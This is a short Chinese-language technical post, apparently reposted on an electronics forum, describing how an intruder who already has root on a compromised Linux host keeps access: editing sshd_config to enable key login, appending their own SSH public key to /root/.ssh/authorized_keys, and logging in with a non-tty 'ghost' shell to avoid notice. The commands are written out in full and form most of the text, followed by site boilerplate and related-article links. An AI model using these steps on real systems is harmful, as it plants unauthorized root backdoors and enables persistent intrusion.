0x00 前提
以前的老東西,拿出水一篇
一般是通過 Rce,提權等等情況,拿到目標 linux 的 root 權限
主要是沒有密碼, hash 跑不出來,機器無法正常出網
就可以去試著正向鏈接
0x01 首先目標主機,修改目標 Ssh 服務配置
啟用ssh證書登錄,并重啟SSH 服務
echo RSAAuthentication yes >> /etc/ssh/sshd_config echo PubkeyAuthentication yes >> /etc/ssh/sshd_config systemctl restart sshd
0x02 本地linux上生成密鑰
# ssh-keygen -t rsa -P "" -f ~/.ssh/id_rsa
注意:這一步最好去一個純凈的Linux生成,因為這個key會暴露你的主機名

//找見id_rsa.pub自行拷貝出來 ls -al /root/.ssh/ cp /root/.ssh/id_rsa.pub /home/xxxx/Desktop/ //賦于權限 chmod 777 /home/xxxx/Desktop/id_rsa.pub/root/.ssh/文件夾里面有倆文件:
id_rsa(私鑰) id_rsa.pub(公鑰)
0x03 linux目標機寫入公鑰
自行上傳公鑰到內網linux,并將其保存到/root/.ssh/目錄下,文件名改為authorized_keys,或者命令執行用echo追加
如目標已事先存在authorized_keys文件,直接往最后追加即可
注意:再操作之前要對原authorized_keys進行“備份”,以備不時之需。
# echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8Zrks74SYQ4JzKFvYPyL2tG+Scx/y/gIDk5znJF6XKjJ2MFS7RfsjKqpRk7bb+bDpgb5awiMzMOUgwBDheJKerji9/FD+jHEI133ejCZphiPL0+OItLdl7uUt+NFMMPNeXh9lmDOwApxVg54xhDjyzWYaV6xQgvWuZK+6qNBD1TW2/zXImeHpC+L37KQSgFvtxyOiYw/Uq/Caoa9VkcFsUsJ1ftmKSh7unkEJiJAHpzmI0SquNdrgTJ5AiVclQbTa8viyl+irXYjUyvxWKCqBhMhuQQFEMRdViVStgSRoVREEH361J7T7oCC0rJE2XV8MlejXZGi7if34gYHYgyBKvEQ9/Ff+fkQV5LXdZLkC0h3wOBLV9lWwMamlFSjJMTSBlZP1syHYV/X1YNO76SmLUUi48PwDQa52g0tI2TusDmjgARWxwhCndu463dwbCcGjfHnSEAWEB2WGJcKOcpfGLUrdDt9My/d26dfMTNdlaw+kdnDVlYvk0qnyBBZhyfE= Zeo@ZeoMacBook-Pro.local >> /root/.ssh/authorized_keys
0x04 幽靈登錄
ssh -T root@192.168.1.1 /usr/bin/bash -i

0x05 利用Scp 無密碼互傳文件
scp -P 22 -r /root/fsacn root@10.211.55.11:/usr/tmp/fsacn審核編輯:湯梓紅
聲明:本文內容及配圖由入駐作者撰寫或者入駐合作網站授權轉載。文章觀點僅代表作者本人,不代表電子發燒友網立場。文章及其配圖僅供工程師學習之用,如有內容侵權或者其他違規問題,請聯系本站處理。
舉報投訴
-
Linux
+關注
關注
88文章
11758瀏覽量
219009 -
主機
+關注
關注
0文章
1053瀏覽量
36742 -
公鑰
+關注
關注
0文章
22瀏覽量
12257 -
SSH
+關注
關注
0文章
200瀏覽量
17720 -
root
+關注
關注
1文章
86瀏覽量
22099
原文標題:實戰|無密碼Linux主機利用公鑰直接連接
文章出處:【微信號:菜鳥學信安,微信公眾號:菜鳥學信安】歡迎添加關注!文章轉載請注明出處。
發布評論請先 登錄
相關推薦
熱點推薦
配置公鑰指紋
AppGallery Connect可為簽名證書自動生成對應的公鑰摘要信息并計算出對應的SHA256指紋,您直接在AppGallery Connect獲取與配置即可。每個HarmonyOS應用/元
發表于 01-05 10:03
刪除公鑰指紋
的“應用”區域,找到“SHA256證書/公鑰指紋”欄中需刪除的公鑰指紋,點擊。
4。彈出確認提示框,核對指紋信息無誤后,點擊“確認”。
本文參考鴻蒙官方文檔
發表于 01-07 15:31
藍牙連接主機可否直接連接保存的地址,不用每次掃描再連接?
藍牙連接主機可否直接連接保存的地址,不用每次掃描再連接?藍牙第一次主從機連了以后,我記下了從機的地址,利用flash保存下來了下次
發表于 04-06 15:11
git公鑰、私鑰使用經驗
今天在windows用了git,整理下遇到的問題。首先生成密鑰(包含公鑰和私鑰),然后就等待公鑰通過管理員被服務器接收,接下來就可以clone了,但是最開始的時候,可以通過驗證,但是不
發表于 12-10 22:40
【觸覺智能 Purple Pi OH 開發板體驗】無網絡狀態連接ssh解決辦法
]
---------
無網絡狀態連接ssh解決辦法
有多種連接SSH的方式,以下是其中一些常見的方式:
終端命令行連接: 在終端命令行中,使用ssh命令加上目標
發表于 08-20 12:38
基于Chebyshev多項式的公鑰密碼系統算法
介紹有限域Chebyshev多項式的定義和性質。針對基于有限域Chebyshev多項式的類ElGamal公鑰密碼系統存在的弱點,提出一個新的公鑰
發表于 04-08 08:36
?13次下載
基于橢圓曲線的EIGamal加密體制的組合公鑰分析及應用
分析了基于橢圓曲線的EIGamal 密碼的組合公鑰技術。基于種子公鑰和密鑰映射的新技術可以實現從有限的種子變量產生幾乎“無限”密鑰對,有望解
發表于 08-28 08:20
?8次下載
用JAVA語言實現RSA公鑰密碼算法
用JAVA語言實現RSA公鑰密碼算法:本文闡述了公開密鑰密碼體制RSA算法的原理及實現技術。并在此基礎上,給出了JAVA語言實現的RSA算法源代碼。關鍵詞:ILSA體制;
發表于 02-10 10:27
?58次下載
公鑰密碼分析簡介
對公鑰密碼體制的密碼分析歷史的形成,給出一些重要結果的描述和重要文獻的歷史發展線索,同時對2010年-2014年有限域和橢圓曲線的離散對數問題的突破性進展給予了簡單介紹.自公
發表于 01-16 11:38
?1次下載
如何使用生成的公鑰加密數據和私鑰解密數據
是最早、應用最廣泛的公鑰密碼系統之一。它以其創始人Ron Rivest、AdiShamir和Leonard Adleman的名字命名,幾乎成為公鑰
發表于 12-06 10:23
?8302次閱讀
本源量子算力賦能公鑰密碼應用
發展趨勢進行廣泛交流,深入探討商用密碼、區塊鏈、隱私計算、后量子密碼等技術的演進趨勢。本源量子作為國內率先在金融領域探索量子計算應用的團隊受邀參加,并就量子計算在公鑰
發表于 11-26 16:28
?1269次閱讀
實戰|無密碼Linux主機利用公鑰直接連接
評論